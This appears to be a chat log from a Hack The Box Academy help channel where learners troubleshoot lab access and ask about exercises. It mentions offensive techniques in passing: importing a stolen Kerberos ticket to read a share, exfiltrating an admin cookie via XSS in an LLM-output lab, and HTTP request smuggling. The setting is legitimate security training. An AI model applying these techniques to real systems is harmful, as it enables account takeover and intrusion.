thick socket
#

i'm using exactly what i've download here

slate zinc
#

did u try sudo killall one?

thick socket
#

yep, i'm gonna download same vpn and re-connect

#

nah, same issue. vpn connection is working perfectly

#

but SSH no

#

😭

#
ssh: connect to host 10.129.45.153 port 22: Connection timed out
soft moon
#

whats the url for the module?

thick socket
soft moon
#

hmmm jump into dms
I see if I can help

#

https://academy.hackthebox.com/module/147/section/1657
could anyone please enlighten me with this question?
Ive been stuck on this part for a few days now and bit lost

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

surreal galleon
#

Hi guys in new how do I join the main chat

soft moon
#

I am able to get the cached from tmp but from there I am bit lost

soft moon
surreal galleon
#

It don’t say anything

soft moon
#

hmmm 1 second

#

my bad checkout #welcome that should help you @surreal galleon

surreal galleon
#

Oh lol

#

Thank bro 👍🏽very helpful

soft moon
#

no problems meanwhile I cant pass a ticket :/

rose zodiac
soft moon
#

yes with cp /tmp/krb.... then export KRB5CC...
but after that little confused

#

because when I did the smbclient command and saw julio dir in the C$ I thought huh that was a little too simple

safe bramble
#

Guys Linux fundamentals, user management module, someone help me out with the questions, they are getting rejected

soft moon
#

rejected as incorrect?

safe bramble
soft moon
#

send url and which question you are stuck on

safe bramble
soft moon
mystic osprey
#

Hey guys,
I am trying to solve the lab 1 for the XSS section in the LLM output attacks module. I successfully exfiltrated the admin cookie and I know it's value, but I don't get the flag. What am I doing wrong? I Appreciate any help.

surreal galleon
#

Guys do I need to learn terminal to then do python?

#

And to what lvl ?

cloud urchin
surreal galleon
#

I want to script and hack

#

I’m doing the Linux module

#

Oh ok my bad

cloud urchin
solar grove
#

I can't solve the question in the Http Attacks TE.CL thread. I put 2 requests in the same group but when I send them the requests hang.

hollow kernel
#

Hi Is there any module help to write a more profesional report?

#

For cpts exam

cloud urchin
#

I'd recommend sticking as close to the Documentation and Reporting module as possible.

rugged sinew
#

Hi, I am sorry to bother. I am at the first question with Module for Windows RDP. But there is no IP address to connect :

I read the channel rules and think this is here I can post. Let me know if I am mistaken !

cloud urchin
#

click that to spawn it, then it shows you the IP

rugged sinew
#

Yes, but then I have to connect through RDP to another host and we do not have the IP

cloud urchin
hollow kernel
hollow kernel
#

Thanks

rugged sinew
hollow kernel
cloud urchin
hollow kernel
#

Ping the target

rugged sinew
# hollow kernel Ping the target

I would like to, but I can't find the IP address of the RDP target (I spawned a Linux system and we should then connect to a distant Windows target)

hollow kernel
#

You need to ckick spawn IP address and wait a few minutes

cloud urchin
rugged sinew
#

I am not sure to understand since I am already connected. I know it sounds stupid and I am sorry to bother

cloud urchin
#

it's not stupid at all, don't worry about it and you're not a bother

#

Can you try again now, does it work now?